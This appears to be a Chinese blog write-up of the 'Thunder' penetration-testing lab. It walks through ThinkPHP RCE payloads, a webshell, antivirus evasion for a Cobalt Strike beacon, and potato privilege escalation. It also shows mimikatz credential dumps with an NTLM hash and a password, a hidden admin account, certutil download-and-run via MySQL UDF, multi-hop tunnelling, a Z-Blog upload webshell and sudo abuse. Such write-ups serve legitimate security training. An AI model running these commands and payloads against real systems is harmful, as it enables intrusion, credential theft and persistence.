靶机渗透-Thunder | 风尘孤狼
0%

靶机渗透-Thunder

靶机渗透-Thunder-记录

flag1

TP RCE

[+] http://172.20.56.32 的检测结果如下:
=====================================================================
[-] 目标不存在tp5_debug_index_ids_sqli漏洞
[-] 目标不存在tp_update_sql漏洞
[-] 目标不存在tp5_index_construct_rce漏洞
[-] 目标不存在tp5_construct_debug_rce漏洞
[+] 目标存在tp5_dbinfo_leak漏洞, payload:
      http://172.20.56.32?s=index/think\config/get&name=database.hostname
      hostname: 127.0.0.1, hostport: , database: , username: , password: root
[-] 目标不存在tp2_lite_code_exec漏洞
[-] 目标不存在tp5_invoke_func_code_exec_2漏洞
[-] 目标不存在tp5_construct_code_exec_3漏洞
[-] 目标不存在tp5_method_filter_code_exec漏洞
[-] 目标不存在tp5_construct_code_exec_2漏洞
[-] 目标不存在tp_cache漏洞
[-] 目标不存在tp5_construct_code_exec_4漏洞
[-] 目标不存在tp5_construct_code_exec_1漏洞
[-] 目标不存在tp_view_recent_xff_sqli漏洞
[-] 目标不存在tp5_driver_display_rce漏洞
[-] 目标不存在tp_pay_orderid_sqli漏洞
[-] 目标不存在tp6_session_file_write漏洞
[-] 目标不存在tp_checkcode_time_sqli漏洞
[-] 目标不存在tp5_templalte_driver_rce漏洞
[-] 目标不存在tp5_index_showid_rce漏洞
[-] 目标不存在tp5_session_include漏洞
[-] 目标不存在tp_multi_sql_leak漏洞
[-] 目标不存在tp5_request_input_rce漏洞
[+] 目标存在tp5_file_include漏洞, payload: 
      http://172.20.56.32?s=index/\think\Lang/load&file=C:\windows\win.ini
[+] 目标存在tp5_invoke_func_code_exec_1漏洞
image-20250203205515954
nt authority\local service
nt authority\local service
dir C:\


2025/01/21  14:59    <DIR>          360Downloads
2025/01/21  14:38               479 flag.txt
2016/07/16  21:23    <DIR>          PerfLogs
2025/01/21  13:43    <DIR>          phpStudy
2016/12/14  19:06    <DIR>          Program Files
2025/01/31  10:29    <DIR>          Program Files (x86)
2025/01/21  13:40    <DIR>          Users
2025/01/21  14:08    <DIR>          Windows
type C:\flag.txt

            )            )  (           (     
  *   )  ( /(         ( /(  )\ )        )\ )  
` )  /(  )\())    (   )\())(()/(   (   (()/(  
 ( )(_))((_)\     )\ ((_)\  /(_))  )\   /(_)) 
(_(_())  _((_) _ ((_) _((_)(_))_  ((_) (_))   
|_   _| | || || | | || \| | |   \ | __|| _ \  
  | |   | __ || |_| || .` | | |) || _| |   /  
  |_|   |_||_| \___/ |_|\_| |___/ |___||_|_\  
go-flag{137ee666-7623-4550-85bd-e8163d91c9b0}
                                              

flag2

查看杀软,有360主动防御。

tasklist /SVC

系统进程   杀软名称
360rps.exe   Qihoo-360
ZhuDongFangYu.exe   360安全卫士-主动防御
MsMpEng.exe   Microsoft Security Essentials
360tray.exe   360安全卫士-实时保护
360sd.exe   360杀毒
360rp.exe   360杀毒
MpCmdRun.exe   Windows Defender Antivirus
C:/phpStudy/WWW/public/static/ >ipconfig

Windows IP 配置


以太网适配器 以太网实例 0:

   连接特定的 DNS 后缀 . . . . . . . : 
   本地链接 IPv6 地址. . . . . . . . : fe80::d19d:b26b:a54e:c597%16
   IPv4 地址 . . . . . . . . . . . . : 172.20.56.32
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 172.20.56.233

以太网适配器 以太网实例 2:

   连接特定的 DNS 后缀 . . . . . . . : 
   本地链接 IPv6 地址. . . . . . . . : fe80::1d42:8b49:69d9:3c54%17
   IPv4 地址 . . . . . . . . . . . . : 172.20.57.30
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 172.20.57.1

隧道适配器 isatap.{DF359468-7753-400C-AE4C-A17B3672A32A}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开连接
   连接特定的 DNS 后缀 . . . . . . . : 

隧道适配器 isatap.{C0CFE62E-3EAD-44FF-A1EE-892111C1D636}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开连接
   连接特定的 DNS 后缀 . . . . . . . :

getshell【哥斯拉】

http://172.20.56.32/static/2.php
phpinfo()

PHP Version 5.4.45
C:/phpStudy/WWW/public/static/ >net user

\\ 的用户帐户

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest

传fscan扫

[+] 端口开放 172.20.57.98:3306
[+] 端口开放 172.20.57.30:3306
[+] 端口开放 172.20.57.98:445
[+] 端口开放 172.20.57.30:445
[+] 端口开放 172.20.57.98:139
[+] 端口开放 172.20.57.30:139
[+] 端口开放 172.20.57.98:135
[+] 端口开放 172.20.57.30:135
[+] 端口开放 172.20.57.30:80
[*] NetInfo
[*] 172.20.57.30
   [->] WIN-BCQDCARVJPJ
   [->] 172.20.56.32
   [->] 172.20.57.30
[*] 网站标题 http://172.20.57.30       状态码:200 长度:931    标题:无标题
[*] NetInfo
[*] 172.20.57.98
   [->] WIN-J2B9EIUKEN3
   [->] 172.20.57.98
   [->] 10.0.0.65
[*] NetBios 172.20.57.98    WORKGROUP\WIN-J2B9EIUKEN3           Windows Server 2016 Standard 14393
[+] [发现漏洞] 目标: http://172.20.57.30
  漏洞类型: poc-yaml-thinkphp5-controller-rce
  漏洞名称: 
  详细信息: %!s(<nil>)
[+] 端口开放 172.20.56.233:8080
[+] 端口开放 172.20.56.32:3306
[+] 端口开放 172.20.56.32:445
[+] 端口开放 172.20.56.32:139
[+] 端口开放 172.20.56.32:135
[+] 端口开放 172.20.56.32:80
[+] 端口开放 172.20.56.233:22
[*] NetInfo
[*] 172.20.56.32
   [->] WIN-BCQDCARVJPJ
   [->] 172.20.56.32
   [->] 172.20.57.30
[*] 网站标题 https://172.20.56.233:8080 状态码:404 长度:19     标题:无标题
[*] 网站标题 http://172.20.56.32       状态码:200 长度:931    标题:无标题
[+] [发现漏洞] 目标: http://172.20.56.32
  漏洞类型: poc-yaml-thinkphp5-controller-rce
  漏洞名称: 
  详细信息: %!s(<nil>)

权限是nt authority\local service,先CS上线之后提权,因为有360主动防御,所以需要做一下免杀。生成C的payload用掩日试一下。

image-20250204095809187

成功上线,使用sweet-potato进行提权为SYSTEM

image-20250204100540161

抓密码

Authentication Id : 0 ; 401220 (00000000:00061f44)
Session           : Interactive from 1
User Name         : Administrator
Domain            : WIN-BCQDCARVJPJ
Logon Server      : WIN-BCQDCARVJPJ
Logon Time        : 2025/2/4 1:34:34
SID               : S-1-5-21-3032252582-605398383-1541951267-500
   msv :	
    [00000005] Primary
    * Username : Administrator
    * Domain   : WIN-BCQDCARVJPJ
    * NTLM     : 744bf4af8b4e9eb0dfe9ced60cc29db3
    * SHA1     : 5b161cec6486a0722bf3f7af5ac4a9bbc50663ce
   tspkg :	
   wdigest :	
    * Username : Administrator
    * Domain   : WIN-BCQDCARVJPJ
    * Password : (null)
   kerberos :	
    * Username : Administrator
    * Domain   : WIN-BCQDCARVJPJ
    * Password : (null)
   ssp :	
   credman :	
    [00000000]
    * Username : WIN-BCQDCARVJPJ\Administrator
    * Domain   : WIN-BCQDCARVJPJ\Administrator
    * Password : Tp@cslKM

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN-BCQDCARVJPJ$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2025/2/4 1:33:53
SID               : S-1-5-20
   msv :	
   tspkg :	
   wdigest :	
    * Username : WIN-BCQDCARVJPJ$
    * Domain   : WORKGROUP
    * Password : (null)
   kerberos :	
    * Username : win-bcqdcarvjpj$
    * Domain   : WORKGROUP
    * Password : (null)
   ssp :	
   credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2025/2/4 1:33:55
SID               : S-1-5-19
   msv :	
   tspkg :	
   wdigest :	
    * Username : (null)
    * Domain   : (null)
    * Password : (null)
   kerberos :	
    * Username : (null)
    * Domain   : (null)
    * Password : (null)
   ssp :	
   credman :	

Authentication Id : 0 ; 77379 (00000000:00012e43)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/2/4 1:33:55
SID               : S-1-5-90-0-1
   msv :	
   tspkg :	
   wdigest :	
    * Username : WIN-BCQDCARVJPJ$
    * Domain   : WORKGROUP
    * Password : (null)
   kerberos :	
   ssp :	
   credman :	

Authentication Id : 0 ; 77359 (00000000:00012e2f)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/2/4 1:33:55
SID               : S-1-5-90-0-1
   msv :	
   tspkg :	
   wdigest :	
    * Username : WIN-BCQDCARVJPJ$
    * Domain   : WORKGROUP
    * Password : (null)
   kerberos :	
   ssp :	
   credman :	

Authentication Id : 0 ; 33071 (00000000:0000812f)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2025/2/4 1:33:52
SID               : 
   msv :	
   tspkg :	
   wdigest :	
   kerberos :	
   ssp :	
   credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN-BCQDCARVJPJ$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2025/2/4 1:33:51
SID               : S-1-5-18
   msv :	
   tspkg :	
   wdigest :	
    * Username : WIN-BCQDCARVJPJ$
    * Domain   : WORKGROUP
    * Password : (null)
   kerberos :	
    * Username : win-bcqdcarvjpj$
    * Domain   : WORKGROUP
    * Password : (null)
   ssp :	
   credman :

开启RDP之后连接

[*] Tasked beacon to run: REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
[*] Tasked beacon to run: wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
[+] host called home, sent: 244 bytes
[+] received output:
操作成功完成。


[+] received output:
执行(\\WIN-BCQDCARVJPJ\ROOT\CIMV2\TerminalServices:Win32_TerminalServiceSetting.ServerName="WIN-BCQDCARVJPJ")->SetAllowTSConnections()

方法执行成功。

外参数:
instance of __PARAMETERS
{
   ReturnValue = 0;
};

image-20250204101534265

加入隐藏用户并加入管理组,进行权限维持

shell net user test okm@123 /add
shell net localgroup administrators test /add

连接RDP之后关闭360主动防御,为后渗透提供便利。同时因为我是用的ubuntu的openvpn,本机用frp也代理出来,然后爆破一下上边搜集到的俩3306数据库,提示密码了

提示:目标喜欢逛cyberstrikelab平台,喜欢用cslab作为账号密码

[+] 端口开放 172.20.57.98:3306
[+] 端口开放 172.20.57.30:3306
image-20250204103812594
2025/2/4 2:37:58----172.20.57.98-----MySQL----root----cslab----5.7.44-log----成功!

mysql考虑UDF提权,直接梭,需要再搭建一层代理,是这个TP的边缘机和ubuntu之间的代理。

#ubuntu
./admin_linux_x64 -rhost 172.20.56.32 -rport 1111

#TP边缘机
agent.exe -lport 1111

#ubuntu设置socks代理
(admin node) >>> show
A
+ -- 1
(admin node) >>> goto 1
node 1
(node 1) >>> socks 2222      
a socks5 proxy of the target node has started up on the local port 2222.

结合proxyfier

image-20250204105757265

成功获取98机器的shell,权限为nt authority\network service,依然是windows机器

image-20250204105715847

Windows IP 配置


以太网适配器 以太网实例 0:

   连接特定的 DNS 后缀 . . . . . . . : 
   本地链接 IPv6 地址. . . . . . . . : fe80::f57a:3cc6:fa1f:544a%15
   IPv4 地址 . . . . . . . . . . . . : 172.20.57.98
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 172.20.57.1

以太网适配器 以太网实例 2:

   连接特定的 DNS 后缀 . . . . . . . : 
   本地链接 IPv6 地址. . . . . . . . : fe80::a8d8:f91e:c558:501f%14
   IPv4 地址 . . . . . . . . . . . . : 10.0.0.65
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 10.0.0.1

隧道适配器 isatap.{88F0BDFA-1D9B-4F51-B42D-8F38C5C6FBD3}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开连接
   连接特定的 DNS 后缀 . . . . . . . : 

隧道适配器 isatap.{85CBBCF4-0797-42B6-8065-7F9CFC440E47}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开连接
   连接特定的 DNS 后缀 . . . . . . . :

先来查看一下机器杀软情况,是微软的 Defender

系统进程 杀软名称
MsMpEng.exe Microsoft Security Essentials
MpCmdRun.exe Windows Defender Antivirus

flag2同样也在C盘根目录,不过读不了,应该是权限问题,先考虑上线提权

image-20250204112531287

尝试直接利用ubuntu机器远程下载CS马,还是先用掩日免杀试试,用certutil命令下载,因为这个98机器和ubuntu是不通的,所以把exe放到边缘机的web服务下来远程下载

certutil是windows的一款下载文件的工具,自从WindowsServer2003就自带,但是在Server 2003使用会有问题,也就是说,该命令是在Win7及其以后的机器中使用。其功能可校验文件MD5,SHA1,SHA256,下载恶意文件和免杀

select sys_eval("certutil.exe -urlcache -split -f http://172.20.57.30/FSz.exe");

select sys_eval("FSz.exe http://172.20.57.30/FSz.txt");

下载之后就被杀了,用掩日进行分离免杀,采用网络分离。

image-20250204113500351

传上去了,活的很好,尝试执行,这里没上线,还是因为内网问题,并不能直接回弹到ubuntu的CS。虽然98机器开着445,可以考虑用psexec来进行横向传递,但是并不知道这个98机器的管理员账密,尝试无果,最终考虑使用pystinger进行代理转发来进行上线。

#上传proxy.php到边缘机
访问回显UTF-8

#上传stinger_server.exe,执行
start stinger_server.exe 0.0.0.0

#攻击机上执行
./stinger_client -w http://172.20.56.32/static/proxy.php -l 127.0.0.1 -p 60000
[此时已经将web服务器的60020端口转发到vps的60020端口上了]

#CS设置监听,HTTP Hosts为中转机器的内网ip即172.20.57.30[这里要注意因为是双网卡,不注意可能用56的,肯定是不通的],端口为60020

#直接生成payload正常进行免杀点击就会上线CS

还是使用sweet-potato进行提权至SYSTEM

image-20250204124719720

读取根目录下的flag

image-20250204124831999

go-flag{2e4eb283-bb22-4c40-91ec-07f158859af9}

flag3

同样的思路先开启3389,抓密码,密码抓了个寂寞

Authentication Id : 0 ; 52510 (00000000:0000cd1e)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/2/4 7:21:05
SID               : S-1-5-90-0-1
   msv :	
   tspkg :	
   wdigest :	
    * Username : WIN-J2B9EIUKEN3$
    * Domain   : WORKGROUP
    * Password : (null)
   kerberos :	
   ssp :	
   credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN-J2B9EIUKEN3$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2025/2/4 7:21:04
SID               : S-1-5-20
   msv :	
   tspkg :	
   wdigest :	
    * Username : WIN-J2B9EIUKEN3$
    * Domain   : WORKGROUP
    * Password : (null)
   kerberos :	
    * Username : win-j2b9eiuken3$
    * Domain   : WORKGROUP
    * Password : (null)
   ssp :	
   credman :	

Authentication Id : 0 ; 24623 (00000000:0000602f)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2025/2/4 7:21:03
SID               : 
   msv :	
   tspkg :	
   wdigest :	
   kerberos :	
   ssp :	
   credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2025/2/4 7:21:05
SID               : S-1-5-19
   msv :	
   tspkg :	
   wdigest :	
    * Username : (null)
    * Domain   : (null)
    * Password : (null)
   kerberos :	
    * Username : (null)
    * Domain   : (null)
    * Password : (null)
   ssp :	
   credman :	

Authentication Id : 0 ; 52485 (00000000:0000cd05)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/2/4 7:21:05
SID               : S-1-5-90-0-1
   msv :	
   tspkg :	
   wdigest :	
    * Username : WIN-J2B9EIUKEN3$
    * Domain   : WORKGROUP
    * Password : (null)
   kerberos :	
   ssp :	
   credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN-J2B9EIUKEN3$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2025/2/4 7:21:03
SID               : S-1-5-18
   msv :	
   tspkg :	
   wdigest :	
    * Username : WIN-J2B9EIUKEN3$
    * Domain   : WORKGROUP
    * Password : (null)
   kerberos :	
    * Username : win-j2b9eiuken3$
    * Domain   : WORKGROUP
    * Password : (null)
   ssp :	
   credman :

小插曲,有段时间突然这台机器突然掉线了,重复以上操作一直不能再上线,发现是之前的马一直在占用进程,需要先强制kill了

taskkill /im 3.exe /f

加用户管理组,权限维持

shell net user test okm@123 /add
shell net localgroup administrators test /add

远程连接,然后一键三连关闭

image-20250204162956217

上边也已经知道这个机器同样是双网卡,传上去fscan扫一下10.0.0.0/24

fscan.exe -h 172.20.57.0/24

[+] 端口开放 172.20.57.98:445
[+] 端口开放 172.20.57.30:445
[+] 端口开放 172.20.57.30:139
[+] 端口开放 172.20.57.98:139
[+] 端口开放 172.20.57.98:135
[+] 端口开放 172.20.57.30:135
[+] 端口开放 172.20.57.30:80
[+] 端口开放 172.20.57.98:3306
[+] 端口开放 172.20.57.30:3306
[*] NetInfo
[*] 172.20.57.30
   [->] WIN-BCQDCARVJPJ
   [->] 172.20.56.32
   [->] 172.20.57.30
[*] 网站标题 http://172.20.57.30       状态码:200 长度:931    标题:无标题
[*] NetInfo
[*] 172.20.57.98
   [->] WIN-J2B9EIUKEN3
   [->] 172.20.57.98
   [->] 10.0.0.65
[*] NetBios 172.20.57.30    WORKGROUP\WIN-BCQDCARVJPJ           Windows Server 2016 Datacenter 14393
[+] [发现漏洞] 目标: http://172.20.57.30
  漏洞类型: poc-yaml-thinkphp5-controller-rce
  漏洞名称: 
  详细信息: %!s(<nil>)


fscan.exe -h 10.0.0.0/24

[+] 端口开放 10.0.0.65:3306
[+] 端口开放 10.0.0.65:445
[+] 端口开放 10.0.0.65:139
[+] 端口开放 10.0.0.65:135
[+] 端口开放 10.0.0.34:80
[+] 端口开放 10.0.0.34:22
[*] NetInfo
[*] 10.0.0.65
   [->] WIN-J2B9EIUKEN3
   [->] 172.20.57.98
   [->] 10.0.0.65

发现有个80端口的服务,是ZBlog1.7.3

image-20250204163626243

使用ew进行80端口的端口转发,代理出来

ew_for_Win.exe -s lcx_tran -l 5000 -f 10.0.0.34 -g 80

lcx_tran 0.0.0.0:5000 <--[10000 usec]--> 10.0.0.34:80
image-20250204165615798

现在直接访问http://172.20.57.98:5000/即是该web服务

http://172.20.57.98:5000/zb_system/login.php

数据库就在98机器里

image-20250204173931146

所以可以直接通过数据库来篡改密码

    /**
     * 静态方法,获取加盐及二次散列的,用于保存的最终密码
     *
     * @param string $ps   明文密码
     * @param string $guid 用户唯一码
     *
     * @return string
     */
    public static function GetPassWordByGuid($ps, $guid)
    {
        return md5(md5($ps) . $guid);
    }
123456=30492f76a0fbcf3906cce8b4b566d6b6
image-20250204174017047

cslab/123456,进入后台

image-20250204174201774

Z-Blog后台文件上传漏洞,影响版本1.7.3及以下 系统对主题文件代码没有做审查,导致将恶意代码写入主题文件后,被系统生成为文件。黑客可以利用这个漏洞,将恶意代码生成至网站目录,而后通过工具完全控制其主机。

fengyijiu520/Z-Blog-: Z-Blog 后台文件上传漏洞

http://172.20.57.98:5001/zb_users/theme/shell/template/shelll.php
pass
image-20250204175002930
#/home/www/write.sh

#!/bin/bash
if [ "$#" -ne 2 ]; then
    echo "Usage: \$0 <read_file> <append_file>"
    exit 1
fi

read_file="$1"
append_file="$2"

if [ ! -r "$read_file" ]; then
    echo "Error: Cannot read file '$read_file'. Please check if the file exists and you have read permissions."
    exit 1
fi

if [ -e "$append_file" ] && [ ! -w "$append_file" ]; then
    echo "Error: Cannot write to '$append_file'. Please check if the file is writable."
    exit 1
fi

target_dir=$(dirname "$append_file")
if [ ! -d "$target_dir" ]; then
    echo "Error: Directory '$target_dir' does not exist. Please create it before running the script."
    exit 1
fi

if cat "$read_file" >> "$append_file"; then
    echo "Content from '$read_file' has been appended to '$append_file'."
else
    echo "Error: Failed to append content to '$append_file'. Please check write permissions."
    exit 1
fi

这个文件直接有root,所以直接修改文件内容来执行命令获取flag

(www:/home/www) $ sudo -l
Matching Defaults entries for www on localhost:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User www may run the following commands on localhost:
    (ALL) NOPASSWD: /home/www/write.sh
image-20250204175414374
(www:/home/www) $ sudo ./write.sh 
anaconda-ks.cfg
flag.txt
Usage: $0 <read_file> <append_file>
(www:/home/www) $ sudo ./write.sh 
anaconda-ks.cfg
flag.txt
            )            )  (           (     
  *   )  ( /(         ( /(  )\ )        )\ )  
` )  /(  )\())    (   )\())(()/(   (   (()/(  
 ( )(_))((_)\     )\ ((_)\  /(_))  )\   /(_)) 
(_(_())  _((_) _ ((_) _((_)(_))_  ((_) (_))   
|_   _| | || || | | || \| | |   \ | __|| _ \  
  | |   | __ || |_| || .` | | |) || _| |   /  
  |_|   |_||_| \___/ |_|\_| |___/ |___||_|_\  
            
go-flag{D955C315-BF6D-45FD-B342-4E8B1DE76329}

flag4

继续查看网络配置

(www:/home/www) $ ip add
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether e0:8a:8a:80:75:c5 brd ff:ff:ff:ff:ff:ff
    inet 10.0.0.34/24 scope global ens3
       valid_lft forever preferred_lft forever
    inet6 fe80::e28a:8aff:fe80:75c5/64 scope link 
       valid_lft forever preferred_lft forever
3: ens6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether a0:de:87:04:b1:ab brd ff:ff:ff:ff:ff:ff
    inet 10.1.1.78/24 scope global ens6
       valid_lft forever preferred_lft forever
    inet6 fe80::a2de:87ff:fe04:b1ab/64 scope link 
       valid_lft forever preferred_lft forever

发现还有10.1段的网络,fscan太大蚁剑不好传,写个冰蝎马

image-20250204182134319
./fscan -h 10.1.1.0/24

[+] 端口开放 10.1.1.56:443
[+] 端口开放 10.1.1.78:80
[+] 端口开放 10.1.1.56:22
[+] 端口开放 10.1.1.78:22
[+] 端口开放 10.1.1.56:7071
[+] 端口开放 10.1.1.56:8443
[+] 端口开放 10.1.1.56:11211
[*] 网站标题 http://10.1.1.78          状态码:200 长度:7121   标题:Good Luck To You! - cyberstrikelab
[+] Memcached 10.1.1.56:11211 未授权访问
再用venom二次代理
node 1>listen 777

agent.exe -rhost 172.20.57.30 -rport 777



node 2>listen 777

./agent_linux_x64 -rhost 10.0.0.65 -rport 777
(node 3) >>> show
A
+ -- 1
     + -- 2
          + -- 3
(node 3) >>>

linux开启firewalld了,先关闭

systemctl stop firewalld
systemctl status firewalld

这里可以看到已经关闭了

● firewalld.service - firewalld - dynamic firewall daemon
   Loaded: loaded (/usr/lib/systemd/system/firewalld.service; enabled; vendor preset: enabled)
   Active: inactive (dead) since Tue 2025-02-04 15:23:10 CST; 4h 54min ago
     Docs: man:firewalld(1)
  Process: 664 ExecStart=/usr/sbin/firewalld --nofork --nopid $FIREWALLD_ARGS (code=exited, status=0/SUCCESS)
 Main PID: 664 (code=exited, status=0/SUCCESS)

Feb 04 15:23:03 localhost.localdomain systemd[1]: Starting firewalld - dynamic firewall daemon...
Feb 04 15:23:05 localhost.localdomain systemd[1]: Started firewalld - dynamic firewall daemon.
Feb 04 15:23:05 localhost.localdomain firewalld[664]: WARNING: AllowZoneDrifting is enabled. This is considered an insecure configuration option. It will be removed in a future release. Please consider disabling it now.
Feb 04 15:23:09 localhost.localdomain systemd[1]: Stopping firewalld - dynamic firewall daemon...
Feb 04 15:23:10 localhost.localdomain systemd[1]: Stopped firewalld - dynamic firewall daemon.

是Zimbra XXE SSRF,直接复现即可

参考链接

Zimbra xxe+ssrf导致getshell_zimbra getshell-CSDN博客

【内网—内网转发】——代理转发_ew(Earthworm)代理转发_ew代理-CSDN博客

zimbra攻防笔记-XXE+SSRF RCE – NooEmotionの摆烂屋

不出网上线CS(cobaltstrike)的各种姿势_cobaltstrike 代理goproxy-CSDN博客

[靶场复现计划]CSLAB Thunder

制作不易,如若感觉写的不错,欢迎打赏